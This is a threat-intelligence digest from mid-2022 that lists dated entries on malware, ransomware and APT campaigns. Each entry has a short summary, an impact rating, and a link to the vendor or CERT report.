Intel Name:: The_new_Hive_variant

Date of Scan:: 2022-07-06

Impact:: MEDIUM

Summary:: Microsoft Threat Intelligence Center discovered the new variant while analyzing detected Hive ransomware techniques for dropping .key files

Source: https://www.microsoft.com/security/blog/2022/07/05/hive-ransomware-gets-upgrades-in-rust/

Intel Source:: ReversingLabs

Intel Name:: Malicious_NPM_Packages_Stealing_Data

Date of Scan:: 2022-07-06

Impact:: LOW

Summary:: ReversingLabs researchers uncover malicious NMP packages stealing data as an evidence of a widespread software supply chain attack.

Source: https://blog.reversinglabs.com/blog/iconburst-npm-software-supply-chain-attack-grabs-data-from-apps-websites

Intel Source:: JPCERT

Intel Name:: Vsingle_Malware_used_by_Lazarus_Group

Date of Scan:: 2022-07-05

Impact:: MEDIUM

Summary:: Researchers from JPCERT detailed about VSingle malware used by the Lazarus group, which has been updated to retrieve C2 servers information from GitHub.

Source: https://blogs.jpcert.or.jp/en/2022/07/vsingle.html

Intel Source:: Cyble

Intel Name:: Xloader_Malware_returns_with_new_infection_technique

Date of Scan:: 2022-07-05

Impact:: MEDIUM

Summary:: Researchers at Cyble has analysed an infection chain of Xloader malware. The malware uses multiple file types such as PDF, XLSX, and RTF for its initial infection and execution. It is also designed to drop three modules in memory and execute the final payload using the Process-Hollowing technique.

Source: https://blog.cyble.com/2022/07/01/xloader-returns-with-new-infection-technique/

Intel Source:: SecureList

Intel Name:: SessionManager_IIS_backdoor

Date of Scan:: 2022-07-04

Impact:: MEDIUM

Summary:: Researchers at SecureList were investigating IIS backdoor called SessionManager since early 2022. SessionManager has been used against NGOs, government, military and industrial organizations in Africa, South America, Asia, Europe, Russia and the Middle East, starting from at least March 2021.

Source: https://securelist.com/the-sessionmanager-iis-backdoor/106868/

Intel Source:: Intezer

Intel Name:: YTStealer_Malware

Date of Scan:: 2022-07-04

Impact:: LOW

Summary:: YTStealer is a malware that aims to steal YouTube authentication cookies. As a stealing program, it acts like many other stealing programs.

Source: https://www.intezer.com/blog/research/ytstealer-malware-youtube-cookies/

Intel Source:: Inquest

Intel Name:: GlowSand_Campaign

Date of Scan:: 2022-07-04

Impact:: LOW

Summary:: Researchers at Inquest has analysed Multistage malicious documnet masquerading as a Ukrainian military payroll document. The document was Obfuscated and geofenced to only infect UKraine systems.

Source: https://inquest.net/blog/2022/06/27/glowsand

Intel Source:: CISA

Intel Name:: MedusaLocker_Ransomware

Date of Scan:: 2022-07-04

Impact:: MEDIUM

Summary:: In a joint advisory by CISA, FBI, Treasury, FinCEN to support the #StopRansomware camapign, providing information on MedusaLocker ransomware. Observed as recently as May 2022, MedusaLocker actors predominantly rely on vulnerabilities in Remote Desktop Protocol(RDP) to access victims’ networks

Source: https://www.cisa.gov/uscert/sites/default/files/publications/AA22-181A_stopransomware_medusalocker.pdf

Intel Source:: Cyble

Intel Name:: PennyWise_Infostealer_leveraging_YouTube_to_infect_users

Date of Scan:: 2022-07-01

Impact:: LOW

Summary:: Threat Hunters by exercising they discovered, a new stealer named “PennyWise”.The stealer appears to have been developed recently. The investigation indicated that the stealer is an emerging threat and the researchers witnessed multiple samples of this stealer active in the wild.

Source: https://blog.cyble.com/2022/06/30/infostealer/

Intel Source:: Google blog

Intel Name:: Countering_hack_for_hire_attacker_groups

Date of Scan:: 2022-07-01

Impact:: LOW

Summary:: Google's Threat Analysis Group (TAG) on Thursday released that they blocked as many as 36 malicious domains operated by hack-for-hire groups from India, Russia, and the U.A.E. It has been seen hack-for-hire groups target human rights and political activists, journalists, and other high-risk users around the world, putting their privacy, safety and security at risk.

Source: https://blog.google/threat-analysis-group/countering-hack-for-hire-groups/

Intel Source:: Sekoia

Intel Name:: Raccoon_Stealer_v2

Date of Scan:: 2022-06-30

Impact:: LOW

Summary:: It was observed by reserachers this weekthey that cyber criminals using a new and improved version of the productive malware Raccoon Stealer that was barely three months after its authors announced they were quitting.

Source: https://blog.sekoia.io/raccoon-stealer-v2-part-1-the-return-of-the-dead/

Intel Source:: Trend Micro

Intel Name:: Black_Basta_Ransomware_gang_added_Qakbot_and_PrintNightmare_Exploit_to_their_Arsenal

Date of Scan:: 2022-06-30

Impact:: MEDIUM

Summary:: Researchers at Trend Micro identified Black Basta ransomware ransomware group that used the banking trojan QakBot as a means of entry and movement and took advantage of the PrintNightmare vulnerability to perform privileged file operations.

Source: https://www.trendmicro.com/en_us/research/22/f/black-basta-ransomware-operators-expand-their-attack-arsenal-wit.html

Intel Source:: NetSkope

Intel Name:: Emotet_still_abusing_Microsoft_Office_Macros

Date of Scan:: 2022-06-30

Impact:: MEDIUM

Summary:: Researchers at Netskope Threat Labs has analysed campaign where Emotet is still being executed using malicious Mircosoft office documents. Despite the protection Microsoft released in 2022 to prevent the execution of Excel 4.0 (XLM) macros, this attack is still feasible against users who are using outdated versions of Office.

Source: https://www.netskope.com/blog/emotet-still-abusing-microsoft-office-macros https://github.com/netskopeoss/NetskopeThreatLabsIOCs/tree/main/Emotet/2022-06-24

Intel Source:: Lumen blog

Intel Name:: New_ZuoRAT_malware_targets_SOHO_router

Date of Scan:: 2022-06-30

Impact:: LOW

Summary:: Black Lotus Labs, the threat intelligence arm of Lumen Technologies has identified and tracking the details of a new and sophisticated multistage remote access trojan (RAT) that leveraging infected SOHO routers to target predominantly North American and European networks of interest. This trojan grants the actor the ability to pivot into the local network and gain access to additional systems on the LAN by hijacking network communications to maintain an undetected foothold.

Source: https://blog.lumen.com/zuorat-hijacks-soho-routers-to-silently-stalk-networks/ https://github.com/blacklotuslabs/IOCs/blob/main/ZuoRAT_IoCs.txt

Intel Source:: Fortinet

Intel Name:: Ukraine_targeted_by_Dark_Crystal_RAT_or_DCRat

Date of Scan:: 2022-06-29

Impact:: LOW

Summary:: Researchers at FortiGuard Labs came across another file that was likely used in the attack campaign described by CERT-UA. However, the date of the file submission to VirusTotal, and the location of the submission being Ukraine. The new file however is in Excel (xlsx) format and contains malicious macros instead of the docx format and exploitation of CVE-2022-30190 (Follina).

Source: https://www.fortinet.com/blog/threat-research/ukraine-targeted-by-dark-crystal-rat

Intel Source:: ReversingLabs

Intel Name:: AstraLocker_2.0_Ransomware_distributed_from_Microsoft_Word_files

Date of Scan:: 2022-06-29

Impact:: MEDIUM

Summary:: Researchers at ReversingLabs has discovered a new version of the AstraLocker ransomware (AstraLocker 2.0) that was being distributed directly from Microsoft Office files used as bait in phishing attacks.

Source: https://blog.reversinglabs.com/blog/smash-and-grab-astralocker-2-pushes-ransomware-direct-from-office-docs

Intel Source:: ASEC

Intel Name:: Software_Cracks_Distributing_Recordbreaker_Stealer

Date of Scan:: 2022-06-28

Impact:: LOW

Summary:: ASEC Research Team has analysed

Source: https://asec.ahnlab.com/en/35981/

Intel Source:: Kaspersky ICS CERT

Intel Name:: ShadowPad_backdoor_and_MS_Exchange_bug_leveraged_to_attack_ICS

Date of Scan:: 2022-06-28

Impact:: LOW

Summary:: Researchers at Kaspersky ICS CERT has spotted a threat actor targeting organizations in the industrial, telecommunications, logistics and transport sectors in Pakistan, Afghanistan and Malaysia respectively exploiting Microsoft Exchange server vulnerability (CVE-2021-26855) and downloading Shadow backdoor.

Source: https://ics-cert.kaspersky.com/publications/reports/2022/06/27/attacks-on-industrial-control-systems-using-shadowpad/

Intel Source:: Zscaler

Intel Name:: Evilnum_APT_returns_with_new_Threat_and_TTPs

Date of Scan:: 2022-06-28

Impact:: MEDIUM

Summary:: Researchers from Zscaler have been tracking Evilnum APT group since starting of 2022 and have seen this time with a newer target list and TTPs.The main distribution vector used by this threat group was Windows Shortcut files (LNK) sent inside malicious archive files (ZIP) as email attachments in spear phishing emails to the victims.

Source: https://www.zscaler.com/blogs/security-research/return-evilnum-apt-updated-ttps-and-new-targets

Intel Source:: Esentire

Intel Name:: Socgholish_initiated_through_Cobalt_Strike_payloads

Date of Scan:: 2022-06-27

Impact:: LOW

Summary:: ESentire had an observation of drive-by threats such as Socgholish, Gootkit Loader and Solarmarker are on the rise. Both Socgholish and Gootkit Loader have been linked to follow-on attacks initiated through Cobalt Strike payloads.

Source: https://www.esentire.com/blog/socgholish-to-cobalt-strike-in-10-minutes

Intel Source:: CERT-UA

Intel Name:: DarkCrystal_RAT_malware_attacking_Ukraining_telecom_operators

Date of Scan:: 2022-06-27

Impact:: LOW

Summary:: CERT-UA received information about Crystal RAT attack that is aimed at operators and telecommunications providers of Ukraine. It was distributed by e-mails with the topic "Free primary legal aid" and the attachment "Algorithm of actions of members of the family of a missing serviceman LegalAid.rar".

Source: https://cert.gov.ua/article/405538

Intel Source:: ISC.SANS

Intel Name:: Python_malicious_script_executing_a_keylogger

Date of Scan:: 2022-06-27

Impact:: LOW

Summary:: Researcher from ISC.SANS disovered a Python script that has some interesting features that can conduct social engineering attacks

Source: https://isc.sans.edu/forums/diary/Python+abusing+The+Windows+GUI/28780/

Intel Source:: Cybereason

Intel Name:: BlackBastaRansomware

Date of Scan:: 2022-06-25

Impact:: MEDIUM

Summary:: Researchers from Cybereason analyzed the attack of BlackBasta ransomware and provided key details anbout its growth since inception

Source: https://www.cybereason.com/blog/cybereason-vs.-black-basta-ransomware

Intel Source:: ClearSky

Intel Name:: New_malware_associated_with_Iranian_SiameseKitten_Group_or_Lyceum

Date of Scan:: 2022-06-24

Impact:: MEDIUM

Summary:: Researchers at ClearSky security has discovered a new malware linked with Lyceum group. The is downloaded from a domain registered on June 6th, and it communicates with a previously unknown command and control server whose IP address is adjacent to that of the domain.

Source: https://www.clearskysec.com/wp-content/uploads/2022/06/Lyceum-suicide-drone-23.6.pdf

Intel Source:: CISA

Intel Name:: Log4Shell_exploits_still_being_used_to_hack_VMware_servers

Date of Scan:: 2022-06-24

Impact:: MEDIUM

Summary:: CISA warned today that threat actors, including state-backed hacking groups, are still targeting VMware Horizon and Unified Access Gateway (UAG) servers using the Log4Shell (CVE-2021-44228) remote code execution vulnerability.

Source: https://www.cisa.gov/uscert/ncas/alerts/aa22-174a https://www.bleepingcomputer.com/news/security/cisa-log4shell-exploits-still-being-used-to-hack-vmware-servers/

Intel Source:: Group-IB

Intel Name:: Conti_ArmAttack_Campaign

Date of Scan:: 2022-06-24

Impact:: MEDIUM

Summary:: GroupIB researchers documented about CONTI ransomware new campaign dubbed as ARMattack. In this campaign they compromised at least more than 40 companies and it took 3 days for them to to that.

Source: https://www.group-ib.com/media/conti-armada-report/

Intel Source:: Sekoia

Intel Name:: CALISTO_Russian_Threat_Actor_continues_its_credential_harvesting_campaign

Date of Scan:: 2022-06-24

Impact:: MEDIUM

Summary:: Sekoia Threat & Detection Research Team has followed GoogleTAG team finding on russian threat actor CALISTO, and identified a phishing campaign where CALISTO uses Evilginx on its VPS to capture the victim’s credentials. This well known open source tool creates an SSL reverse proxy between the victim and a legitimate website to capture web credentials, 2FA tokens.

Source: https://blog.sekoia.io/calisto-continues-its-credential-harvesting-campaign/

Intel Source:: ASEC

Intel Name:: LockBit_Ransomware_being_distributed_using_Copyright_related_Emails

Date of Scan:: 2022-06-24

Impact:: MEDIUM

Summary:: ASEC Research team has discovered the distribution of LockBit ransomware using phishing e-mail, and disguising itself as copyright claims e-mail. The phishing e-mail has a compressed file as an attachment that contains another compressed file inside.

Source: https://asec.ahnlab.com/en/35822/

Intel Source:: SecureWorks

Intel Name:: BRONZ_STARLIGHT_Ransomware_Operations_levearge_HUI_Loader

Date of Scan:: 2022-06-24

Impact:: MEDIUM

Summary:: Researchers at Secureworks CTU has observed a China-linked state-sponsored hacking group named Bronze Starlight deploying various ransomware families to hide the true intent of its attacks.

Source: https://www.secureworks.com/research/bronze-starlight-ransomware-operations-use-hui-loader

Intel Source:: CERT-UA

Intel Name:: Chinese_Threat_actors_targets_Russian_Government_Agencies

Date of Scan:: 2022-06-23

Impact:: LOW

Summary:: CERT UA researchers discovered malicious files which have been used to exploit vulnerabilities in MS Office. This attack has been linked to Chinese threat actors.

Source: https://cert.gov.ua/article/375404

Intel Source:: Cyble

Intel Name:: Keona_Clipper_Leverages_Telegram_For_Anonymity

Date of Scan:: 2022-06-23

Impact:: LOW

Summary:: Cyble researchers found a post advertising a new clipper malware, namely “Keona Clipper.” The Keona clipper is unique and anonymous software wrapped in a Telegram bot with stealth and anonymity. Additionally, the malware disguises itself as a system file and sends victim details to a Telegram bot.

Source: https://blog.cyble.com/2022/06/22/keona-clipper-leverages-telegram-for-anonymity/

Intel Source:: Palo Alto

Intel Name:: AA_distribution_Qakbot_with_DarkVNC_and_Cobalt Strike

Date of Scan:: 2022-06-23

Impact:: MEDIUM

Summary:: Securonix Threat Intelligence unit has identified a new wave of QBOT infection further delivering DarkVNC and Cobalt Strike.

Source: https://twitter.com/Unit42_Intel/status/1539700018558427140 https://github.com/pan-unit42/tweets/blob/master/2022-06-21-IOCs-for-AA-distribution-Qakbot-with-DarkVNC-and-Cobalt-Strike.txt

Intel Source:: Lab52

Intel Name:: MuddyWater’s_new_campagin_targetting_Middle_East

Date of Scan:: 2022-06-22

Impact:: MEDIUM

Summary:: MuddyWater threat group, allegedly sponsored by the Iranian government and linked to the Iranian revolutionary guard, has mantained a “long-term” infection campaign targeting Middle East countries. Researchers from Lab52 found recent samples and discovered that attackers might modify its functionality in a later stage, based on the obtained information from the infected host or, at least, use it to download and drop the next infection stage.

Source: https://lab52.io/blog/muddywaters-light-first-stager-targetting-middle-east/

Intel Source:: Kaspersky

Intel Name:: China_Linked_ToddyCat_APT_Pioneers_Novel_Spyware

Date of Scan:: 2022-06-22

Impact:: MEDIUM

Summary:: Researchers from Kaspersky found APT group dubbed ToddyCat has been targeting Microsoft Exchange servers throughout Asia and Europe for more than a year. Also, they found a previously unknown passive backdoor they named Samurai and new trojan malware dubbed Ninja Trojan.

Source: https://securelist.com/toddycat/106799/

Intel Source:: ISC.SANS

Intel Name:: Malicious_PowerShell_attack_in_Cryptocurrency_Browser_Extensions

Date of Scan:: 2022-06-22

Impact:: LOW

Summary:: Researchers from SANS found a malicious powerShell script targeting cryptocurrency browser apps or extensions.

Source: https://isc.sans.edu/diary/rss/28772

Intel Source:: Checkpoint

Intel Name:: Tropic_Trooper_APT_new_TTPs

Date of Scan:: 2022-06-22

Impact:: MEDIUM

Summary:: Check Point researchers shared findings of the infection chain which includes a previously undescribed loader (dubbed “Nimbda”) written in Nim language on a group / activity cluster with ties to Tropic Trooper:

Source: https://research.checkpoint.com/2022/chinese-actor-takes-aim-armed-with-nim-language-and-bizarro-aes/

Intel Source:: BitDefender

Intel Name:: RIG_Exploit_campaign_rapidly_modified_Raccoon_malware_with_Dridex

Date of Scan:: 2022-06-22

Impact:: LOW

Summary:: Bitdefender researchers discovered a new RIG Exploit Kit campaign have rapidly adapted by replacing Raccoon malware with Dridex to make the most of the ongoing campaign.

Source: https://www.bitdefender.com/blog/labs/rig-exploit-kit-swaps-dead-raccoon-with-dridex/ https://www.bitdefender.com/files/News/CaseStudies/study/417/Bitdefender-PR-Whitepaper-Raccoon-creat6205-en-EN.pdf

Intel Source:: Cyble

Intel Name:: Quantum Software Possibly Linked to Lazarus APT group

Date of Scan:: 2022-06-22

Impact:: LOW

Summary:: Researchers from Cyble came across a post from a threat actor on deep web forum advertising about Quantum Software a LNK file based builder and it has possible links with Lazarus APT group.

Source: https://blog.cyble.com/2022/06/22/quantum-software-lnk-file-based-builders-growing-in-popularity/

Intel Source:: McAfee

Intel Name:: Rise_of_LNK_Malware

Date of Scan:: 2022-06-22

Impact:: MEDIUM

Summary:: Researchers at McAfee Labs has identified three campiagns, where attackers abusing the windows shortcut LNK files and made them to be extremely dangerous to the common users. LNK files are being used to deliver malware such as Emotet, Qakbot, and IcedID.

Source: https://www.mcafee.com/blogs/other-blogs/mcafee-labs/rise-of-lnk-shortcut-files-malware/#:~:text=An%20LNK%20file%20is%20a to%20access%20another%20data%20object.

Intel Source:: CERT-UA

Intel Name:: APT28_levarging_CredoMap_Malware_to-target_Ukraine

Date of Scan:: 2022-06-21

Impact:: LOW

Summary:: CERT-UA has analysed a phishing email which contains an attachment of malicious document related to Nuclear Terrorism, after opening to it will leads to downloading an HTML file and executing JavaScript code (CVE-2022-30190), it will further download and launch the CredoMap malware.

Source: https://cert.gov.ua/article/341128

Intel Source:: CERT-UA

Intel Name:: UAC_0098_targeting_Ukraine_Critical_Infrastructure_facilities

Date of Scan:: 2022-06-21

Impact:: LOW

Summary:: CERT-UA has analysed an phishing email contains an attached malicious documents which open an HTML file and execute JavaScript code (CVE-2022-30190), it further download and run the malicious program Cobalt Strike Beacon.

Source: https://cert.gov.ua/article/339662

Intel Source:: Resecurity

Intel Name:: Cybercriminals_levearging_Azure_Front_Door_service_in_Phishing_attacks

Date of Scan:: 2022-06-21

Impact:: LOW

Summary:: Researchers at Resecurity has identified a phishing campaign delivered via Azure Front Door (AFD) service by Microsoft. This attack allows the bad actors to trick users and spread phishing content to intercept credentials from business applications and e-mail accounts.

Source: https://resecurity.com/blog/article/cybercriminals-use-azure-front-door-in-phishing-attacks

Intel Source:: Cisco Talos

Intel Name:: Avos_Ransomware_adds_new_Arsenal

Date of Scan:: 2022-06-21

Impact:: MEDIUM

Summary:: Researchers from Cisco Talos found a month long AvosLocker ransomware campaign in which the threat actors have leveraged Cobalt Strike, Sliver and multiple commercial network scanners.

Source: https://blog.talosintelligence.com/2022/06/avoslocker-new-arsenal.html

Intel Source:: Zscaler

Intel Name:: Voicemail_themed_Phishing_attacks_targeting_industries_in_US

Date of Scan:: 2022-06-20

Impact:: MEDIUM

Summary:: Researchers from Zscalar ThreatLabz has identified and monitoring the activities of a threat actor which targets users in various US-based organizations with malicious voicemail-notification-themed emails in an attempt to steal their Office365 and Outlook credentials.

Source: https://www.zscaler.com/blogs/security-research/resurgence-voicemail-themed-phishing-attacks-targeting-key-industry

Intel Source:: Malwarebytes

Intel Name:: Client_side_Magecart_attacks_still_around_but_more_covert

Date of Scan:: 2022-06-20

Impact:: MEDIUM

Summary:: Malwarebytes reseraches are saying that Magecart client-side attacks are still around and there are some changes took place in the threat landscape. Newly reported domains linked with ‘anti-VM’ skimmer. One thing known is that if the Magecart threat actors decided to switch their operations exclusively server-side then the majority of companies would lose visibility overnight.

Source: https://blog.malwarebytes.com/threat-intelligence/2022/06/client-side-magecart-attacks-still-around-but-more-covert/

Intel Source:: CyberInt

Intel Name:: BlackGuard_Infostealer

Date of Scan:: 2022-06-20

Impact:: LOW

Summary:: Researchers at CyberInt discovered campaigns abusing gaming forums and Discord channels to distribute BlackGuard, along with a new data exfiltration technique using Telegram.

Source: https://cyberint.com/blog/research/blackguard-stealer/

Intel Source:: ASEC

Intel Name:: Malicious_HWP_Files_distributed_through_PC_messengers

Date of Scan:: 2022-06-17

Impact:: LOW

Summary:: ASEC Research team has discovered the active distribution of APT files that are exploiting a feature of HWP files and targeting South-Korean users since long.

Source: https://asec.ahnlab.com/en/35405/

Intel Source:: Trendmicro

Intel Name:: CopperStealer_Malware_infecting_via_websites_hosting_fake_software

Date of Scan:: 2022-06-17

Impact:: MEDIUM

Summary:: Trendmicro noticed a new version of CopperStealer with the infection vector starts with a website offering fake cracks and 2 stages of the attack: cryptor and dropper.

Source: https://www.trendmicro.com/de_de/research/22/f/websites-hosting-fake-cracks-spread-updated-copperstealer.html https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/f/websites-hosting-fake-cracks-spread-updated-copperstealer-malware/IOCs-websites-hosting-fake-cracks-spread-updated-copperstealer.txt

Intel Source:: Cyble

Intel Name:: Cerber2021_Ransomware_Back_In_Action

Date of Scan:: 2022-06-17

Impact:: MEDIUM

Summary:: Cyble Research Labs has analysed a smaple of Cerber2021 ransomware, which suggests that threat actors exploit recently patched/unpatched Atlasian vulnerabilities to deliver the ransomware.

Source: https://blog.cyble.com/2022/06/17/cerber2021-ransomware-back-in-action/ https://otx.alienvault.com/indicator/domain/pigetrzlperjreyr3fbytm27bljaq4eungv3gdq2tohnoyfrqu4bx5qd.onion

Intel Source:: ISC.SANS

Intel Name:: Malspam_pushes_Matanbuchus_malware

Date of Scan:: 2022-06-17

Impact:: LOW

Summary:: Researchers from SANS found a malicious campaign pushing Matanbuchus malware which lead to Cobalt Strike.

Source: https://isc.sans.edu/diary/rss/28752

Intel Source:: Fortinet

Intel Name:: New_IceLoader_malware_3_0

Date of Scan:: 2022-06-17

Impact:: MEDIUM

Summary:: While hunting for new malware families written in the Nim programming language, FortiGuard Labs discovered a loader malware with the strings “ICE_X” and “v3.0”. A loader is a type of malware that is intended for downloading and executing additional payloads provided by a threat actor to further their malicious objectives.

Source: https://www.fortinet.com/blog/threat-research/new-icexloader-3-0-developers-warm-up-to-nim

Intel Source:: S2W INC

Intel Name:: New_Version_of_Raccon_Stealer

Date of Scan:: 2022-06-17

Impact:: LOW

Summary:: Researchers from S2W Inc shared details around the new version of Raccoon Stealer and its operator who made announcement on the dark web forum “Exploit”, stating that after three and a half months of being temporarily suspended, V2 of the stealer is operational.

Source: https://medium.com/s2wblog/raccoon-stealer-is-back-with-a-new-version-5f436e04b20d

Intel Source:: Volexity

Intel Name:: Zero_Day_Sophos_Firewall_Exploitation_and_an_Insidious_Breach_by_DriftingCloud_threat_actor

Date of Scan:: 2022-06-16

Impact:: MEDIUM

Summary:: Volexity observesed a backdoored Shophos Firewall attack. This particular attack leveraged a zero-day exploit to compromise the customer's firewall. Also it was observed the attacker implement an interesting webshell backdoor, create a secondary form of persistence, and ultimately launch attacks against the customer's staff. These attacks aimed to further breach cloud-hosted web servers hosting the organization's public-facing websites.

Source: https://www.volexity.com/blog/2022/06/15/driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach/ https://github.com/volexity/threat-intel/blob/main/2022/2022-06-15%20DriftingCloud%20-%20Zero-Day%20Sophos%20Firewall%20Exploitation%20and%20an%20Insidious%20Breach/indicators/indicators.csv

Intel Source:: Cofense

Intel Name:: Monkeypox_phishing_outbreak

Date of Scan:: 2022-06-16

Impact:: LOW

Summary:: Cofense's Phishing Defence Center has seen attempts to deceive enterprise staff with a series of monkeypox themed phishing emails. As this rare infection spreads around the globe and gains media attention, attackers are likely to continue tweaking their tactics.

Source: https://cofense.com/blog/monkeypox-phishing-outbreak-becomes-latest-lure

Intel Source:: Qualys

Intel Name:: New_Redline_InfoStealer_campaign

Date of Scan:: 2022-06-16

Impact:: LOW

Summary:: Qualys researchers found a new Redline InfoStealer campaign which spreads via fake cracked software hosted on Discord’s content delivery network.

Source: https://blog.qualys.com/vulnerabilities-threat-research/2022/06/15/new-qualys-research-report-inside-a-redline-infostealer-campaign https://www.qualys.com/docs/whitepapers/qualys-wp-fake-cracked-software-caught-peddling-redline-stealers-v220606.pdf

Intel Source:: ISC.SANS

Intel Name:: Houdini_RAT_leveraging_JavaScript_Dropper

Date of Scan:: 2022-06-16

Impact:: LOW

Summary:: Houdini leveraging a phishing email with a ZIP archive that contains a JavaScript file called “New-Order.js

Source: https://isc.sans.edu/diary/rss/28746

Intel Source:: SocInvestigations

Intel Name:: QBot_returns_with_new_TTPs

Date of Scan:: 2022-06-16

Impact:: LOW

Summary:: Socinvestigation detection and response analysts detected a banking trojan malware QBOT coming back with new TTPS: distribution via XLSB, and via XLTM.

Source: https://www.socinvestigation.com/qbot-returns-returns-with-new-ttps-detection-response/

Intel Source:: Sophos

Intel Name:: Confluence_exploits_leveraged_to_drop_ransomware_payloads

Date of Scan:: 2022-06-16

Impact:: MEDIUM

Summary:: Researchers at Sophos Labs has identified attackers are leveraging Confluence exploits against Windows vulnerable servers and dropping Cerber Ransomware and also pushing down Cobalt Strike shellcode, running PowerShell commands.

Source: https://news.sophos.com/en-us/2022/06/16/confluence-exploits-used-to-drop-ransomware-on-vulnerable-servers/ https://github.com/sophoslabs/IoCs/blob/master/CVE-2022-26134_attacks.csv

Intel Source:: Qualys

Intel Name:: Potential_attack_vector_using_Follina_Vulnerability

Date of Scan:: 2022-06-15

Impact:: MEDIUM

Summary:: Qualys researchers has examined a potential attack vector as well as technical details of Follina vulnerability.

Source: https://blog.qualys.com/product-tech/2022/06/14/detect-the-follina-msdt-vulnerability-cve-2022-30190-with-qualys-multi-vector-edr-context-xdr

Intel Source:: Cyble

Intel Name:: Hydra_Android_Distributed_Via_Play_Store

Date of Scan:: 2022-06-15

Impact:: LOW

Summary:: During the routine threat hunting exercise, Cyble Research Labs came across a Twitter Post wherein the researcher mentioned an Android malware variant published on the Play Store. The variant in question acts as a Hostile Downloader and downloads the Hydra Banking Trojan.

Source: https://blog.cyble.com/2022/06/13/hydra-android-malware-distributed-via-play-store/ https://twitter.com/AndroidInSecure/status/1534175436187500548

Intel Source:: Sophos

Intel Name:: Old Telerik vulnerability exploitation delivering cryptominer and CobaltStrike infections

Date of Scan:: 2022-06-15

Impact:: LOW

Summary:: Researchers from Sophos discovered an exploitation of a three-year old vulnerability (CVE-2019-18935) in the Telerik UI web application framework to take control of web servers, installing Cobalt Strike beacons in the form of a DLL payload) to disk, then used the beacon to execute encoded PowerShell commands, which downloaded more malwares by an unknown threat actor.

Source: https://news.sophos.com/en-us/2022/06/15/telerik-ui-exploitation-leads-to-cryptominer-cobalt-strike-infections/

Intel Source:: Sophos

Intel Name:: Old_Telerik_vulnerability_exploitation_delivering_cryptominer_and_CobaltStrike_infections

Date of Scan:: 2022-06-15

Impact:: LOW

Summary:: Researchers from Sophos discovered an exploitation of a three-year old vulnerability (CVE-2019-18935) in the Telerik UI web application framework to take control of web servers, installing Cobalt Strike beacons in the form of a DLL payload) to disk, then used the beacon to execute encoded PowerShell commands, which downloaded more malwares by an unknown threat actor.

Source: https://news.sophos.com/en-us/2022/06/15/telerik-ui-exploitation-leads-to-cryptominer-cobalt-strike-infections/

Intel Source:: ISC.SANS

Intel Name:: Saitama_backdoor_using_DNS_tunneling

Date of Scan:: 2022-06-15

Impact:: LOW

Summary:: Researchers identified Saitama backdoor was used in a phishing e-mail that targeted a government official from Jordan’s foreign ministry in an attack attributed to the Iranian group APT34.

Source: https://isc.sans.edu/forums/diary/Translating+Saitamas+DNS+tunneling+messages/28738/ https://morphuslabs.com/translating-saitamas-dns-tunneling-messages-877e3a3ed1d6

Intel Source:: Akamai

Intel Name:: Panchan_Botnet_targeting_Linux_servers

Date of Scan:: 2022-06-15

Impact:: MEDIUM

Summary:: Researchers at Akamai has discovered Panchan, a new peer-to-peer botnet and SSH worm and has been actively breaching Linux servers. Panchan is written in Golang, and utilizes its built-in concurrency features to maximize spreadability and execute malware modules.

Source: https://www.akamai.com/blog/security/new-p2p-botnet-panchan

Intel Source:: Esentire

Intel Name:: Purple_Fox_malware_analysis

Date of Scan:: 2022-06-14

Impact:: LOW

Summary:: eSentire’s Threat Response Unit (TRU) team recently observed multiple Purple Fox infections. The malware targets vulnerable versions of Internet Explorer (IE). The infection starts with the execution of a malicious script via mshta.exe, a utility that runs Microsoft HTML Applications (HTA) files.

Source: https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-purple-fox

Intel Source:: Zscaler

Intel Name:: PureCrypter_dropping_RATs_and_InfoStealer

Date of Scan:: 2022-06-14

Impact:: LOW

Summary:: Zscalers researchers documented workings of a fully-featured malware loader dubbed PureCrypter that's being purchased by cyber criminals to deliver remote access trojans (RATs) and information stealers.

Source: https://www.zscaler.com/blogs/security-research/technical-analysis-purecrypter

Intel Source:: Confiant

Intel Name:: How_SeaFlower_installs_backdoors_in_iOS_Android_web3_wallets

Date of Scan:: 2022-06-14

Impact:: MEDIUM

Summary:: Confiant believes SeaFlower is the most technically sophisticated threat targeting web3 users, right after the infamous Lazarus Group

Source: https://blog.confiant.com/how-seaflower-%E8%97%8F%E6%B5%B7%E8%8A%B1-installs-backdoors-in-ios-android-web3-wallets-to-steal-your-seed-phrase-d25f0ccdffce

Intel Source:: Jamf

Intel Name:: ChromeLoader_adware_halted_from_broadcasting_by_Jamf_Protect

Date of Scan:: 2022-06-14

Impact:: MEDIUM

Summary:: CrowdStrike researchers tracked an adware campaign that injects ads into Chrome and Safari browsers on macOS. Victims are tricked into opening a DMG file and running a shell script which masquerades as a legitimate installer application.

Source: https://www.jamf.com/blog/chromeloader-adware/

Intel Source:: Malwarebytes

Intel Name:: The_IP2Scam_tech_support_campaign_scammers

Date of Scan:: 2022-06-14

Impact:: LOW

Summary:: Malwarebytes break down what they call the IP2Scam tech support scheme, by going back in time to track previously used infrastructure

Source: https://blog.malwarebytes.com/threat-intelligence/2022/06/taking-down-the-ip2scam-tech-support-campaign/ https://github.com/MBThreatIntel/TSS/blob/master/digital_ocean_IP2Scam.csv https://github.com/MBThreatIntel/TSS/blob/master/digital_ocean_IP2Scam.csv

Intel Source:: Checkpoint

Intel Name:: Iranian_phishing_campaign_linked_to_Phosphorous_APT_group

Date of Scan:: 2022-06-14

Impact:: LOW

Source: https://research.checkpoint.com/2022/check-point-research-exposes-an-iranian-phishing-campaign-targeting-former-israeli-foreign-minister-former-us-ambassador-idf-general-and-defense-industry-executives/

Intel Source:: Avast

Intel Name:: New_Linux_Rootkit_Syslogk

Date of Scan:: 2022-06-14

Impact:: LOW

Summary:: Researchers from Avast spotted a new Linux rootkit, dubbed ‘Syslogk,’ that uses specially crafted “magic packets” to activate a dormant backdoor on the device.

Source: https://decoded.avast.io/davidalvarez/linux-threat-hunting-syslogk-a-kernel-rootkit-found-under-development-in-the-wild/

Intel Source:: Palo Alto

Intel Name:: Chinese_APT_GALLIUM_levarges_PingPull_RAT_in_Cyberespionage_Campaigns

Date of Scan:: 2022-06-13

Impact:: MEDIUM

Summary:: Unit 42 recently identified a new, difficult-to-detect remote access trojan named PingPull being used by GALLIUM, an advanced persistent threat (APT) group.

Source: https://unit42.paloaltonetworks.com/pingpull-gallium/

Intel Source:: CERT-UA

Intel Name:: UAC_0113_Sandworm_Group_targeting_media_organisations_in_Ukraine

Date of Scan:: 2022-06-13

